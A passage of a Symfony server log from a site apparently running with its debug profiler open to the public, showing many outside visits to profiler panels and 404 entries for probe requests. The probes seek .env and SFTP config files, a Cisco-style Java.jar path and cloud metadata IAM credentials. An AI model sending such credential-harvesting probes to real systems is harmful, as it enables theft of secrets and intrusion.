  1630. [2025-12-17 02:53:13] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1631. [2025-12-17 02:53:13] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1632. [2025-12-17 02:53:13] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1633. [2025-12-17 02:53:13] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1634. [2025-12-17 02:53:13] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1635. [2025-12-17 02:53:13] security.DEBUG: Calling Authentication entry point. [] []
  1636. [2025-12-17 02:53:13] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  1637. [2025-12-17 02:53:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-json" (from "http://admin.unda.co/wp-json")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-json\" (from \"http://admin.unda.co/wp-json\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1638. [2025-12-17 02:54:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab?panel=security","method":"GET"} []
  1639. [2025-12-17 02:54:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  1640. [2025-12-17 03:00:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab?panel=request","method":"GET"} []
  1641. [2025-12-17 03:00:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  1642. [2025-12-17 03:06:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab?panel=config","method":"GET"} []
  1643. [2025-12-17 03:06:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1644. [2025-12-17 03:07:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"337ee8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/337ee8","method":"GET"} []
  1645. [2025-12-17 03:07:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  1646. [2025-12-17 03:13:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab?panel=cache","method":"GET"} []
  1647. [2025-12-17 03:13:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1648. [2025-12-17 03:13:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1649. [2025-12-17 03:13:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1650. [2025-12-17 03:16:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1651. [2025-12-17 03:22:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab","method":"GET"} []
  1652. [2025-12-17 03:22:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1653. [2025-12-17 03:27:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1654. [2025-12-17 03:29:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45?panel=twig","method":"GET"} []
  1655. [2025-12-17 03:29:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1656. [2025-12-17 03:31:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"44e619","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/44e619?panel=form","method":"GET"} []
  1657. [2025-12-17 03:31:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  1658. [2025-12-17 03:32:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a42ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a42ca9?panel=dump","method":"GET"} []
  1659. [2025-12-17 03:32:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  1660. [2025-12-17 03:36:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45?panel=time","method":"GET"} []
  1661. [2025-12-17 03:36:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  1662. [2025-12-17 03:39:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f4dabc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f4dabc?panel=logger","method":"GET"} []
  1663. [2025-12-17 03:39:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  1664. [2025-12-17 03:41:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1665. [2025-12-17 03:42:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45?panel=request","method":"GET"} []
  1666. [2025-12-17 03:42:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  1667. [2025-12-17 03:48:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sftp-config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sftp-config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1668. [2025-12-17 03:48:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1669. [2025-12-17 03:48:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45?panel=security","method":"GET"} []
  1670. [2025-12-17 03:48:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  1671. [2025-12-17 03:50:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1672. [2025-12-17 03:51:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48c5ed","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48c5ed?panel=swiftmailer","method":"GET"} []
  1673. [2025-12-17 03:51:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  1674. [2025-12-17 03:53:15] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0c2be6","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/0c2be6/search/results?ip=189.172.28.162&limit=10&method=GET","method":"GET"} []
  1675. [2025-12-17 03:53:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.28.162&limit=10&method=GET","method":"GET"} []
  1676. [2025-12-17 03:53:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1677. [2025-12-17 03:55:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006?panel=twig","method":"GET"} []
  1678. [2025-12-17 03:55:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1679. [2025-12-17 04:01:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006?panel=time","method":"GET"} []
  1680. [2025-12-17 04:01:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  1681. [2025-12-17 04:07:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006?panel=security","method":"GET"} []
  1682. [2025-12-17 04:07:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  1683. [2025-12-17 04:14:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006?panel=request","method":"GET"} []
  1684. [2025-12-17 04:14:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  1685. [2025-12-17 04:17:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
  1686. [2025-12-17 04:17:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  1687. [2025-12-17 04:18:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1688. [2025-12-17 04:21:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006?panel=config","method":"GET"} []
  1689. [2025-12-17 04:21:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1690. [2025-12-17 04:22:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"03fd91","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/03fd91","method":"GET"} []
  1691. [2025-12-17 04:22:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  1692. [2025-12-17 04:27:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006?panel=cache","method":"GET"} []
  1693. [2025-12-17 04:27:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1694. [2025-12-17 04:33:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006","method":"GET"} []
  1695. [2025-12-17 04:33:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1696. [2025-12-17 04:40:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3?panel=twig","method":"GET"} []
  1697. [2025-12-17 04:40:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1698. [2025-12-17 04:41:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1699. [2025-12-17 04:41:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1700. [2025-12-17 04:41:24] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"f89e9a","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/f89e9a/search/results?ip=141.95.74.78&limit=10","method":"GET"} []
  1701. [2025-12-17 04:41:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=141.95.74.78&limit=10","method":"GET"} []
  1702. [2025-12-17 04:44:23] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  1703. [2025-12-17 04:44:23] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1704. [2025-12-17 04:44:23] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1705. [2025-12-17 04:44:23] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1706. [2025-12-17 04:44:23] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1707. [2025-12-17 04:44:23] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1708. [2025-12-17 04:44:23] security.DEBUG: Calling Authentication entry point. [] []
  1709. [2025-12-17 04:44:23] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  1710. [2025-12-17 04:44:23] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  1711. [2025-12-17 04:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1712. [2025-12-17 04:44:23] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  1713. [2025-12-17 04:44:23] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  1714. [2025-12-17 04:44:23] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1715. [2025-12-17 04:44:23] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1716. [2025-12-17 04:44:23] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1717. [2025-12-17 04:44:23] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1718. [2025-12-17 04:44:24] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1719. [2025-12-17 04:44:24] security.DEBUG: Calling Authentication entry point. [] []
  1720. [2025-12-17 04:44:24] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  1721. [2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1722. [2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1723. [2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
